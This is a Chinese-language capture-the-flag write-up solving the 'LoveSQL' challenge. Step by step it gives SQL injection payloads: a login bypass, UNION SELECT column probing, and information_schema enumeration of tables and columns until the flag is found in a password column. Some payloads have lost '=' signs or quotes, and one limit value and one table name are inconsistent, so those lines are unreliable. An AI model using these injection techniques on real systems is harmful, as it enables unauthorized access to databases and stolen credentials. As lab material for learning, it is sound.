![[极客大挑战 2019]LoveSQL_CTF2](http://pic.xiahunao.cn/yaotu/[极客大挑战 2019]LoveSQL_CTF2)
靶场环境用户登陆页面展示解题过程步骤一进入靶场后看见用户名和密码框用户名输入1 or 11#密码输入1成功登录回显尝试提交CTF2{c8bffd77808d7e311653f36a7907de3a}和c8bffd77808d7e311653f36a7907de3a都失败了说明这不是flag。步骤二通过 UNION SELECT 1,2,3#尝试出有三列而第二列会回显故构造 UNION SELECT 1,database(),3#来获取当前数据库名(database()是内置函数用于获取当前数据库名)步骤三构造获取数据库表名的payload。Payload1: union select 1,(select table_name from information_schema.tables where table_schemageek limit 0,1),3#返回第一个表名为 geekuser。Payload2: union select 1,(select table_name from information_schema.tables where table_schemageek limit 1,1),3#返回第二个表名为 I0ve1ysq1。Payload3: union select 1,(select table_name from information_schema.tables where table_schemageek limit 2,1),3#未返回表名。所以现在我们知道了geek库里有两个表表名分别是geekuser和l0ve1ysq1。步骤四接下来我们尝试从表中获取列名构造获取特定表的列名的payload。 union select 1,(select column_name from information_schema.columns where table_schemageek and table_namegeekuser limit 0,1),3# id union select 1,(select column_name from information_schema.columns where table_schemageek and table_namegeekuser limit 1,1),3# username union select 1,(select column_name from information_schema.columns where table_schemageek and table_namegeekuser limit 1,1),3# password union select 1,(select column_name from information_schema.columns where table_schemageek and table_namel0ve1ysq1 limit 0,1),3# id union select 1,(select column_name from information_schema.columns where table_schemageek and table_namel0ve1ysq1 limit 1,1),3# username union select 1,(select column_name from information_schema.columns where table_schemageek and table_namel0ve1ysq1 limit 2,1),3# password以上payload是我列举的六个上面三个查询geekuser表下三个查询l0ve1ysq1表分别返回参数 id, username, password。 我们通过更改limit n, 1 (n0,1,2,3,4,5,6,7,8......)挨个表查里面的数据经过一番紧张刺激的查询成功在l0ve1ysq1表的password列的第16个字段里找到了flag。payload:union select 1,(select password from l0ve1ysq1 limit 15,1),3#